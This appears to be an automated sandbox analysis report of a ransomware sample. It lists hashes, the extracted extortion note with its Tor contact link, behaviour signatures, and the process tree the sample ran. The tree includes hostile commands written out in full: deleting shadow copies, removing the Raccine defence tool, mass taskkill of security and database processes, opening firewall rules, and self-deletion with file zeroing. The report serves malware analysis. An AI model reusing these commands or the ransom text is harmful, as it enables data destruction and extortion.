Analysis
-
max time kernel
118s -
max time network
117s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
18-10-2021 16:21
General
-
Target
869d05fe732ff419731def3140634df40e887d821430e46d17b1e3703c63b6cf.exe
-
Size
147KB
-
MD5
3198bf588f0ee33319b419d4a647d7ba
-
SHA1
3bdff0596222f364e4bfc0a5874fda0317e21042
-
SHA256
869d05fe732ff419731def3140634df40e887d821430e46d17b1e3703c63b6cf
-
SHA512
c850bf984b98b52afbc2cc5ef52009bfeb695d165c5466adcb520ba5ce546a56018856021b1230105a0246840cde169e19d4b5ee762766e7bda54995a42f98cc
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
Ransom Note
YOUR COMPANY WAS HACKED AND COMPROMISED!!!
All your important files have been encrypted!
Our encryption algorithms are very strong and your files are very well protected,
the only way to get your files back is to cooperate with us and get the decrypter program.
Do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.
____________________________________________________________________________________
For us this is just business and to prove to you our seriousness, we will decrypt you three files for free.
Just open our website, upload the encrypted files and get the decrypted files for free.
____________________________________________________________________________________
! WARNING !
Whole your network was fully COMPROMISED!
We has DOWNLOADED of your PRIVATE SENSITIVE Data, including your Billing info, Insuranse cases, Financial reports,
Business audit, Banking Accounts! Also we have corporate correspondence, information about your clients.
We got even more info about your partners and even about your staff.
Additionally, you must know that your sensitive data has been stolen by our analyst experts and if you choose to no cooperate with us,
you are exposing yourself to huge penalties with lawsuits and government if we both don't find an agreement.
We have seen it before cases with multi million costs in fines and lawsuits,
not to mention the company reputation and losing clients trust and the medias calling non-stop for answers.
Come chat with us and you could be surprised on how fast we both can find an agreement without getting this incident public.
____________________________________________________________________________________
IF YOU ARE AN EMPLOYER OF A COMPANY THEN YOU SHOULD KNOW THAT SPREADING SENSITIVE INFORMATION ABOUT YOUR COMPANY BEING COMPROMISED IS A VIOLATION OF CONFIDENTIALITY.
YOUR COMPANY'S REPUTATION WILL SUFFER AND SANCTIONS WILL BE TAKEN AGAINST YOU.
____________________________________________________________________________________
WE HIGHLY SUGGEST THAT YOU DON'T CONTACT THE AUTHORITIES REGARDING THIS INCIDENT BECAUSE IF YOU DO, THEN AUTHORITIES WILL MAKE THIS PUBLIC WHICH COMES WITH A COST FOR YOUR ENTERPRISE.
THE RECOVERY PROCESS OF YOUR FILES WILL BE FASTER IF YOU COME AND CHAT WITH US EARLY. IF YOU CHOOSE TO COOPERATE, YOU WILL SEE THAT WE ARE PROFESSIONALS WHO GIVES GOOD SUPPORT.
Instructions for contacting us:
____________________________________________________________________________________
You have way:
1) Using a TOR browser!
a. Download and install TOR browser from this site: https://torproject.org/
b. Open the Tor browser. Copy the link: http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion/chat.php?track=MRGHV9TNE1 and paste it in the Tor browser.
c. Start a chat and follow the further instructions.
Key Identifier:
P9YnC2JjQdtZ6zHto9r2V0FWMxDpoJQns1/Y6J/+UJarDB6HxN/GeHrRUVQS5VcNSmp+AsQBY8HwLGMQuYsqdzzYQrrm0gaZSMwsXGh+qG58eSWquCwdqlYSJyzikFake9ZT2iNj3f+mnkzpq8TpkkAx63pFZGvnqGio1iEEvpt9pEmXmc6pSK0tizzQGVOBA/6MFBw6TIfgUfry02PDryoLEeZilraIaduCYhJFiZ8LSkzabJnmDLa22Ux65rXoehjieS5bgdmmyCuRduWEPb/t4vbd3aS/SnvPk5UAgIcfuI9aBGn5Y+QKReW2trMdVeqxwmrPcxwVdX+HFGTJmqS8cBMUBDh5XP3QAv1dU2+/coG9Qrdmkxj/lSPtIWUi/mbdXTi3BVxXqiJp04t46fYx4q03AXdUQE98a9QdU7lemASguS14+eTC/AOLx35tiXfqnmVQK232do73lGulsiOjOcVzrq9sWxhJyhQ9iDZ/5FCqMCv6nj97Kb10X6TkyTsD1jZJDwutikPjerAW42jAXv/7GZxU+8kccg2s7LRHpygGlFt0qjfXzKsQHtOZJgqjKyZlys+VOAi/OzReaXIGj/Pc7mF4wTgJwHBS6ESU/0EuIEX+ihZDdi855n3XAngk1R8h2AxUxD1THZJAnbvzC73EV+p7d5JE73sl98A=
URLs
http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion/chat.php?track=MRGHV9TNE1
Extracted
Path
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
Ransom Note
YOUR COMPANY WAS HACKED AND COMPROMISED!!!
All your important files have been encrypted!
Our encryption algorithms are very strong and your files are very well protected,
the only way to get your files back is to cooperate with us and get the decrypter program.
Do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.
____________________________________________________________________________________
For us this is just business and to prove to you our seriousness, we will decrypt you three files for free.
Just open our website, upload the encrypted files and get the decrypted files for free.
____________________________________________________________________________________
! WARNING !
Whole your network was fully COMPROMISED!
We has DOWNLOADED of your PRIVATE SENSITIVE Data, including your Billing info, Insuranse cases, Financial reports,
Business audit, Banking Accounts! Also we have corporate correspondence, information about your clients.
We got even more info about your partners and even about your staff.
Additionally, you must know that your sensitive data has been stolen by our analyst experts and if you choose to no cooperate with us,
you are exposing yourself to huge penalties with lawsuits and government if we both don't find an agreement.
We have seen it before cases with multi million costs in fines and lawsuits,
not to mention the company reputation and losing clients trust and the medias calling non-stop for answers.
Come chat with us and you could be surprised on how fast we both can find an agreement without getting this incident public.
____________________________________________________________________________________
IF YOU ARE AN EMPLOYER OF A COMPANY THEN YOU SHOULD KNOW THAT SPREADING SENSITIVE INFORMATION ABOUT YOUR COMPANY BEING COMPROMISED IS A VIOLATION OF CONFIDENTIALITY.
YOUR COMPANY'S REPUTATION WILL SUFFER AND SANCTIONS WILL BE TAKEN AGAINST YOU.
____________________________________________________________________________________
WE HIGHLY SUGGEST THAT YOU DON'T CONTACT THE AUTHORITIES REGARDING THIS INCIDENT BECAUSE IF YOU DO, THEN AUTHORITIES WILL MAKE THIS PUBLIC WHICH COMES WITH A COST FOR YOUR ENTERPRISE.
THE RECOVERY PROCESS OF YOUR FILES WILL BE FASTER IF YOU COME AND CHAT WITH US EARLY. IF YOU CHOOSE TO COOPERATE, YOU WILL SEE THAT WE ARE PROFESSIONALS WHO GIVES GOOD SUPPORT.
Instructions for contacting us:
____________________________________________________________________________________
You have way:
1) Using a TOR browser!
a. Download and install TOR browser from this site: https://torproject.org/
b. Open the Tor browser. Copy the link: http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion/chat.php?track=MRGHV9TNE1 and paste it in the Tor browser.
c. Start a chat and follow the further instructions.
Key Identifier: P9YnC2JjQdtZ6zHto9r2V0FWMxDpoJQns1/Y6J/+UJarDB6HxN/GeHrRUVQS5VcNSmp+AsQBY8HwLGMQuYsqdzzYQrrm0gaZSMwsXGh+qG58eSWquCwdqlYSJyzikFake9ZT2iNj3f+mnkzpq8TpkkAx63pFZGvnqGio1iEEvpt9pEmXmc6pSK0tizzQGVOBA/6MFBw6TIfgUfry02PDryoLEeZilraIaduCYhJFiZ8LSkzabJnmDLa22Ux65rXoehjieS5bgdmmyCuRduWEPb/t4vbd3aS/SnvPk5UAgIcfuI9aBGn5Y+QKReW2trMdVeqxwmrPcxwVdX+HFGTJmqS8cBMUBDh5XP3QAv1dU2+/coG9Qrdmkxj/lSPtIWUi/mbdXTi3BVxXqiJp04t46fYx4q03AXdUQE98a9QdU7lemASguS14+eTC/AOLx35tiXfqnmVQK232do73lGulsiOjOcVzrq9sWxhJyhQ9iDZ/5FCqMCv6nj97Kb10X6TkyTsD1jZJDwutikPjerAW42jAXv/7GZxU+8kccg2s7LRHpygGlFt0qjfXzKsQHtOZJgqjKyZlys+VOAi/OzReaXIGj/Pc7mF4wTgJwHBS6ESU/0EuIEX+ihZDdi855n3XAngk1R8h2AxUxD1THZJAnbvzC73EV+p7d5JE73sl98A=
URLs
http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion/chat.php?track=MRGHV9TNE1
Signatures
-
Downloads MZ/PE file
-
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 20 IoCs
Ransomware generally changes the extension on encrypted files.
-
Deletes itself 1 IoCs
-
Drops startup file 1 IoCs
-
Drops desktop.ini file(s) 6 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Modifies WinLogon 2 TTPs 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 49 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\869d05fe732ff419731def3140634df40e887d821430e46d17b1e3703c63b6cf.exe"C:\Users\Admin\AppData\Local\Temp\869d05fe732ff419731def3140634df40e887d821430e46d17b1e3703c63b6cf.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\869d05fe732ff419731def3140634df40e887d821430e46d17b1e3703c63b6cf.exe2⤵
- Deletes itself
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.htaMD5
ddd288ec8cf26cfd3f1cc951700d595f
SHA1c2ab7d5cefe6f4f01e992dca6ef250df125b190f
SHA256dda0ceac6dd9ca506f1394135c4b46b696057bdfd29bf2e49c5b42213f20d144
SHA512eb6930d5ef73ee534208ec31b810fd8281b7dfeb37644cfeefeb0e40ab2891f2ec80ab1e2c8a5ba96e1f04f63cb625f9d7cfec6cfe35442122f0d3895847fc56
-
memory/320-95-0x0000000000000000-mapping.dmp
-
memory/384-58-0x0000000000000000-mapping.dmp
-
memory/432-113-0x0000000000000000-mapping.dmp
-
memory/568-105-0x0000000000000000-mapping.dmp
-
memory/568-92-0x0000000000000000-mapping.dmp
-
memory/668-88-0x0000000000000000-mapping.dmp
-
memory/736-104-0x0000000000000000-mapping.dmp
-
memory/736-74-0x0000000000000000-mapping.dmp
-
memory/792-107-0x0000000000000000-mapping.dmp
-
memory/840-77-0x0000000000000000-mapping.dmp
-
memory/864-96-0x0000000000000000-mapping.dmp
-
memory/900-93-0x0000000000000000-mapping.dmp
-
memory/920-110-0x0000000000000000-mapping.dmp
-
memory/980-124-0x0000000000000000-mapping.dmp
-
memory/1028-114-0x0000000000000000-mapping.dmp
-
memory/1028-87-0x0000000000000000-mapping.dmp
-
memory/1064-102-0x0000000000000000-mapping.dmp
-
memory/1064-63-0x0000000000000000-mapping.dmp
-
memory/1068-106-0x0000000000000000-mapping.dmp
-
memory/1092-61-0x0000000000000000-mapping.dmp
-
memory/1104-86-0x0000000000000000-mapping.dmp
-
memory/1108-108-0x0000000000000000-mapping.dmp
-
memory/1108-75-0x0000000000000000-mapping.dmp
-
memory/1160-89-0x0000000000000000-mapping.dmp
-
memory/1192-60-0x0000000000000000-mapping.dmp
-
memory/1192-121-0x0000000000000000-mapping.dmp
-
memory/1284-103-0x0000000000000000-mapping.dmp
-
memory/1284-90-0x0000000000000000-mapping.dmp
-
memory/1356-65-0x0000000000000000-mapping.dmp
-
memory/1360-57-0x0000000000F90000-0x0000000000F91000-memory.dmpFilesize
4KB
-
memory/1360-55-0x0000000001070000-0x0000000001071000-memory.dmpFilesize
4KB
-
memory/1364-83-0x0000000000000000-mapping.dmp
-
memory/1412-67-0x0000000000000000-mapping.dmp
-
memory/1460-62-0x0000000000000000-mapping.dmp
-
memory/1536-82-0x0000000000000000-mapping.dmp
-
memory/1540-99-0x0000000000000000-mapping.dmp
-
memory/1560-85-0x0000000000000000-mapping.dmp
-
memory/1564-84-0x0000000000000000-mapping.dmp
-
memory/1592-78-0x0000000000000000-mapping.dmp
-
memory/1608-80-0x0000000000000000-mapping.dmp
-
memory/1608-116-0x0000000000000000-mapping.dmp
-
memory/1612-98-0x0000000000000000-mapping.dmp
-
memory/1616-100-0x0000000000000000-mapping.dmp
-
memory/1624-76-0x0000000000000000-mapping.dmp
-
memory/1624-111-0x0000000000000000-mapping.dmp
-
memory/1632-71-0x0000000000000000-mapping.dmp
-
memory/1668-115-0x0000000000000000-mapping.dmp
-
memory/1676-127-0x0000000000000000-mapping.dmp
-
memory/1700-119-0x0000000002520000-0x000000000316A000-memory.dmpFilesize
12.3MB
-
memory/1700-120-0x0000000002520000-0x000000000316A000-memory.dmpFilesize
12.3MB
-
memory/1700-118-0x00000000764D1000-0x00000000764D3000-memory.dmpFilesize
8KB
-
memory/1700-117-0x0000000000000000-mapping.dmp
-
memory/1700-122-0x0000000002520000-0x000000000316A000-memory.dmpFilesize
12.3MB
-
memory/1700-79-0x0000000000000000-mapping.dmp
-
memory/1720-68-0x0000000000000000-mapping.dmp
-
memory/1740-81-0x0000000000000000-mapping.dmp
-
memory/1768-101-0x0000000000000000-mapping.dmp
-
memory/1772-109-0x0000000000000000-mapping.dmp
-
memory/1816-94-0x0000000000000000-mapping.dmp
-
memory/1828-66-0x0000000000000000-mapping.dmp
-
memory/1892-59-0x0000000000000000-mapping.dmp
-
memory/1896-73-0x0000000000000000-mapping.dmp
-
memory/1916-70-0x0000000000000000-mapping.dmp
-
memory/1940-112-0x0000000000000000-mapping.dmp
-
memory/1948-97-0x0000000000000000-mapping.dmp
-
memory/1952-126-0x0000000000000000-mapping.dmp
-
memory/2012-91-0x0000000000000000-mapping.dmp
-
memory/2016-69-0x0000000000000000-mapping.dmp
-
memory/2028-64-0x0000000000000000-mapping.dmp
-
memory/2040-72-0x0000000000000000-mapping.dmp